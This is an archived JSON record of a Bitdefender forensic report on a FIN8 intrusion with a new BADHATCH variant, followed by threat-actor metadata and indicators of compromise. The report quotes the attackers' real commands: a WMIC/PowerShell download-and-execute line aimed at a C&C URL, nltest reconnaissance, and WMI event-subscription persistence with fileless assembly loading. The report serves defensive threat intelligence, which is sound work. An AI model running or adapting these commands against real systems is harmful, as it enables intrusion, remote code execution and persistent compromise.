{ "id": "5d411838-02a9-4f51-89a7-0ae8c74969eb", "created_at": "2026-04-06T00:12:42.717155Z", "updated_at": "2026-04-10T03:34:24.131858Z", "deleted_at": null, "sha1_hash": "5c78065dea2185f0a877d47223ceb1376f75cb76", "title": "Deep Dive Into A FIN8 Attack – A forensic investigation", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 248851, "plain_text": "Deep Dive Into A FIN8 Attack – A forensic investigation\r\nBy Martin Zugec\r\nPublished: 2021-07-27 · Archived: 2026-04-05 13:32:04 UTC\r\nDuring a recent investigation, our researchers encountered a new version of the BADHATCH malware used by the\r\nwell-known threat actor, FIN8. We previously reported that FIN8 was working on a new version of the\r\nBADHATCH malware - and this recent attack supports our findings and conclusions. FIN8 is known for taking\r\nextended breaks to improve their tactics, techniques, and procedures (TTPs) which increases their success rate.\r\nWith each new version of their toolkit, they start with small tests on a limited pool of victims before launching a\r\nfull-scale attack.\r\nOne of the best defensive tools the security community has is to openly share details about these early attacks to\r\nimprove our defensive toolkits.\r\nThe objective of this blog post is to provide insights into an attempted attack by FIN8 on one of our customers,\r\nand how we worked with the customer to thwart the attack before it could fully develop. Through sharing forensic\r\nanalysis of the attack, we hope this threat intelligence can help other organizations targeted by FIN8.\r\nFIN8’s Tried and True Methods\r\nFIN8 targets financial services and POS (point of sale) systems primarily through “living off the land” attacks –\r\nusing built-in tools and interfaces (like PowerShell or WMI) and abusing legitimate services like sslip.io to\r\ndisguise their activity. A combination of preventive capabilities (to slow down attackers and generate early\r\nindicators) and detect \u0026 respond capabilities is necessary to stop professional adversary groups such as FIN8.\r\nNOTE: Prefixes are assigned to a threat group when a group is classified. Common prefixes are APT (Advanced\r\nPersistent Threat), FIN (Financially Motivated), or TEMP/TMP/UNC (Uncategorized). You can read more about\r\nthis from MITRE. Unfortunately, there is no central authority for assigning names, so it is common for the\r\nadversary group to have many assigned aliases from different researchers.\r\nAnatomy of an Attack\r\nhttps://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation\r\nPage 1 of 6\n\nWhile the initial infection vector remains unclear, based on previous attacks by this group, it is understood that\r\nFIN8 most likely used social engineering techniques and spear-phishing campaigns for the initial compromise\r\n(read our analysis of FIN8 BADHATCH).\r\nNetwork Reconnaissance\r\nWe know that at least two user accounts were compromised in the aforementioned attack. The first evidence of a\r\ncompromise was detected on one of the database servers. Once on the network, the attackers engaged in network\r\nreconnaissance and retrieved a list of trusted domains and a list of domain controllers with the following\r\ncommands:\r\nnltest.exe /domain_trusts\r\nnltest.exe /dclist:\u003cdomain\u003e\r\nLateral Movement\r\nAfter their initial reconnaissance, the malicious actors spread across the network expanding their foothold by,\r\nprimarily, targeting domain controllers. They engaged in lateral movement by using the WMIC utility for remote\r\ncode execution (a built-in Windows tool).\r\nw mic.exe /node:\u003ctarget\u003e process call create \"cmd /c powershell.exe -nop -ep bypass -c\r\n$pw='b640a9c0e64704e1e202a07774613a29971fe5aa';$pa='sys';iex (New-Object\r\nSystem.Net.WebClient).DownloadString('https://104-168-237-21.sslip[.]io/134af6')\"\r\nWMIC ( wmic.exe ) was used to create a remote command prompt instance ( cmd.exe ), which then executed the\r\nPowerShell code. The PowerShell command created two variables and attempted to download and execute the\r\npayload from one of FIN8’s Command and Control (C\u0026C) servers. This download was blocked by Bitdefender –\r\nbelow description is based on interpretation of variables discovered in our previous analysis of FIN8 operations.\r\n$pw – Probably password to decrypt the downloaded script file. Because download was blocked, we\r\ncouldn’t analyze the script.\r\nhttps://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation\r\nPage 2 of 6\n\n$pa – Instructions for malicious framework to impersonate the lsass.exe/vmtoolsd.exe token and inject\r\nitself into a new “svchost.exe -k netsvcs” process.\r\nFinally, command line tried to execute ( iex is an alias for Invoke-Expression ) the code downloaded from the\r\nIP address 104[.]168[.]237[.]21 . Threat actors abused sslip.io for connection to C\u0026C - a service that provides\r\nfree IP to domain mapping to make SSL certificate generation easier for traffic encryption. While this service is\r\nlegitimate and widely used, the malware abused it in an attempt at evading detection when connecting to C\u0026C\r\nservers.\r\nFor one of the machines, a slightly different URL was observed (ending with /edaea0 ) with the identical $pw\r\nand $pa variables. The scripts downloaded from sslip.io were unavailable at the time of this analysis as the\r\nserver was down.\r\nThis attempt was blocked by Bitdefender’s command line scanning capability. To avoid the command line\r\nscanning, attackers then switched the attack tool to wmiexec.py from Impacket (a collection of Python classes to\r\nwork with low-level access to packets and network protocols). This Python script connected directly to the target\r\nmachine (without installing any service/agent on the target machine) and used the valid credentials to execute the\r\ncode.\r\nNOTE: As a result of using wmiexec.py, the command lines we noticed on affected machines have specific output\r\nredirection such as \\ 1\u003e \\\\127.0.0.1\\ADMIN$\\__1621898828.3311949 2\u003e\u00261 .\r\nAs is often the case with sophisticated adversaries, the attackers tried different methods to bypass the deployed\r\nsecurity controls. Via trial and error, they were eventually able to take over some of the servers. One script used by\r\nthe malicious actors, C:\\Windows\\Temp\\rdp.ps1 ,was unavailable at the time of this analysis, and we believe it\r\nwas an attempt to use RDP tunneling (FIN8 has been known to use Plink for RDP tunneling).\r\nEstablishing Persistency\r\nAfter successful lateral movement, the attackers tried to establish persistency on selected servers –targeting all\r\ndomain controllers, but also other servers. To achieve persistency, they used WMI Event Subscription with a few\r\ndifferent WMI objects.\r\nPersistency was established on servers using commands such as:\r\ncmd.exe cmd.exe /Q /c powershell.exe -nop -ep bypass -c C:\\sldr.ps1 B4a0f3AE251b7689CFdDe1 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\__1621898828.3311949 2\u003e\u00261\r\nThe script sldr.ps1 contains an RC4 encrypted byte array and the first argument ( B4a0f3AE251b7689CFdDe1 ) is\r\nused as a decryption key. The decrypted script is used to select a .NET binary based on the architecture type (x86\r\nor x64), create WMI objects used for persistence (described later) and create a WMI event trigger. Three objects\r\nare created in WMI to support the persistency.\r\nhttps://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation\r\nPage 3 of 6\n\nThe first object ( root\\cimv2\\Win32_Base64Class ) has a property Prop that contains the code of the payload.\r\nThis is used to store the payload in the WMI object.\r\nThe second object ( root\\subscription\\PerfData ) contains a command to retrieve and execute this payload. This\r\nis what is known as a fileless attack - the binary is loaded into memory and a static method .StartCheck() is\r\nexecuted:\r\npowershell.exe -nop -c\r\n[System.Reflection.Assembly]::Load(([WmiClass]'root\\cimv2:Win32_Base64Class').Properties['Prop'].Value);\r\n[MSDAC.PerfOSChecker]::StartCheck()\r\nFinally, the third object ( root\\subscription\\PerfOs ) handles persistency. It executes the previous PowerShell\r\ncommand when system uptime reaches a certain value (140 seconds after boot up of the system):\r\nSELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA\r\n'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime \u003e= 140 AND\r\nTargetInstance.SystemUpTime \u003c 240\r\nThe entry point of the stored .NET code is the method [MSDAC.PerfOSChecker]::StartCheck() . Once executed,\r\nit decrypts and executes a shellcode that downloads its next stage shellcode by contacting the following domains:\r\napi-cdn[.]net\r\ngit-api[.]com\r\napi-cdnw5[.]net\r\nAfter analyzing the shellcode, Bitdefender was able to download a DLL file that is used in the next stage of attack.\r\nDepending on the architecture, the shellcode downloads the\r\n4e73e9a546e334f0aee8da7d191c56d25e6360ba7a79dc02fe93efbd41ff7aa4 file for the x64 version, and the\r\n05236172591d843b15987de2243ff1bfb41c7b959d7c917949a7533ed60aafd9 file for the x86 version.\r\nThe downloaded DLL files represent an unknown piece of malware and the analysis of it is ongoing. So far, we\r\nknow it is able to collect system information like computer name and volume information and it communicates\r\nwith the same domains as the shellcode. These files are not detected by any AV product (per VirusTotal) at the\r\ntime of discovery and have been signed by Bitdefender in the meantime (see file hashes in the IOCs section\r\nbelow).\r\nFIN8 Response Recommendations\r\nhttps://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation\r\nPage 4 of 6\n\nFIN8 typically targets the financial sector with a goal to compromise institutions and POS networks. In this attack,\r\nBitdefender was able to block a number of malicious actions, thus preventing the attack from fully developing. An\r\nimportant element in this scenario was the expertise of the MDR team who quickly attributed the attack to a\r\nknown adversary group and proactively worked with the customer to thwart the attempt.\r\nTo protect your business from attacks such as this in the future, separate your POS from the networks used by\r\nemployees or guests and monitor access to it. The combination of prevention tools with detection and response\r\ntools are critical to help protect your business. Remember, groups like FIN8 can stealthily infiltrate networks over\r\nmany months, so regularly have your security vendors validate their approach by staying on top of new threats in\r\nyour industry.\r\nIndicators of Compromise \r\nSpecific pre-execution detection for novel tools and artifacts of this attack have been added to Bitdefender\r\nproducts ( Trojan.GenericKD.46463307 , Trojan.GenericKD.46463302 , Trojan.GenericKD.37075281 ,\r\nTrojan.GenericKD.37075888 ). The malicious domains used in this attack were also blacklisted in our traffic scan\r\nengine. \r\nDomains\r\napi-cdn[.]net\r\ngit-api[.]com\r\napi-cdnw5[.]net\r\n104-168-237-21.sslip[.]io\r\nURLs\r\nhttps://104-168-237-21.sslip[.]io/134af6\r\nhttps://104-168-237-21.sslip[.]io/edaea0\r\nSHA256\r\nhttps://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation\r\nPage 5 of 6\n\nede6ca7c3c3aedeb70e8504e1df70988263aab60ac664d03995bce645dff0935\r\n5b8b732d0bb708aa51ac7f8a4ff5ca5ea99a84112b8b22d13674da7a8ca18c28\r\n4e73e9a546e334f0aee8da7d191c56d25e6360ba7a79dc02fe93efbd41ff7aa4\r\n05236172591d843b15987de2243ff1bfb41c7b959d7c917949a7533ed60aafd9\r\nedfd3ae4def3ddffb37bad3424eb73c17e156ba5f63fd1d651df2f5b8e34a6c7\r\nFile Names and Locations\r\nC:\\Windows\\Temp\\sldr.ps1\r\nC:\\Windows\\Temp\\s.ps1\r\nC:\\sldr.ps1\r\nC:\\Users\\Public\\s.ps1\r\nWe would like to thank Dragos Teodor Gavrilut, Victor Vrabie, Cristina Vatamanu and Bogdan “Bob” Botezatu\r\nfor their help with putting this report together.\r\nCONTACT AN EXPERT\r\nSource: https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation\r\nhttps://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation" ], "report_names": [ "deep-dive-into-a-fin8-attack-a-forensic-investigation" ], "threat_actors": [ { "id": "3150bf4f-288a-44b8-ab48-0ced9b052a0c", "created_at": "2025-08-07T02:03:24.910023Z", "updated_at": "2026-04-10T02:00:03.713077Z", "deleted_at": null, "main_name": "GOLD HUXLEY", "aliases": [ "CTG-6969 ", "FIN8 " ], "source_name": "Secureworks:GOLD HUXLEY", "tools": [ "Gozi ISFB", "Powersniff" ], "source_id": "Secureworks", "reports": null }, { "id": "5bdde906-0416-42ee-9100-5ebd95dda77a", "created_at": "2023-01-06T13:46:38.601977Z", "updated_at": "2026-04-10T02:00:03.035842Z", "deleted_at": null, "main_name": "FIN8", "aliases": [ "ATK113", "G0061" ], "source_name": "MISPGALAXY:FIN8", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "72d09c17-e33e-4c2f-95db-f204848cc797", "created_at": "2022-10-25T15:50:23.832551Z", "updated_at": "2026-04-10T02:00:05.336787Z", "deleted_at": null, "main_name": "FIN8", "aliases": [ "FIN8", "Syssphinx" ], "source_name": "MITRE:FIN8", "tools": [ "BADHATCH", "PUNCHBUGGY", "Ragnar Locker", "PUNCHTRACK", "dsquery", "Nltest", "Sardonic", "PsExec", "Impacket" ], "source_id": "MITRE", "reports": null }, { "id": "fc80a724-e567-457c-82bb-70147435e129", "created_at": "2022-10-25T16:07:23.624289Z", "updated_at": "2026-04-10T02:00:04.691643Z", "deleted_at": null, "main_name": "FIN8", "aliases": [ "ATK 113", "G0061", "Storm-0288", "Syssphinx" ], "source_name": "ETDA:FIN8", "tools": [ "ALPHV", "ALPHVM", "BadHatch", "BlackCat", "Noberus", "PSVC", "PUNCHTRACK", "PoSlurp", "Powersniff", "PunchBuggy", "Ragnar Loader", "Ragnar Locker", "RagnarLocker", "Sardonic", "ShellTea" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434362, "ts_updated_at": 1775792064, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5c78065dea2185f0a877d47223ceb1376f75cb76.pdf", "text": "https://archive.orkl.eu/5c78065dea2185f0a877d47223ceb1376f75cb76.txt", "img": "https://archive.orkl.eu/5c78065dea2185f0a877d47223ceb1376f75cb76.jpg" } }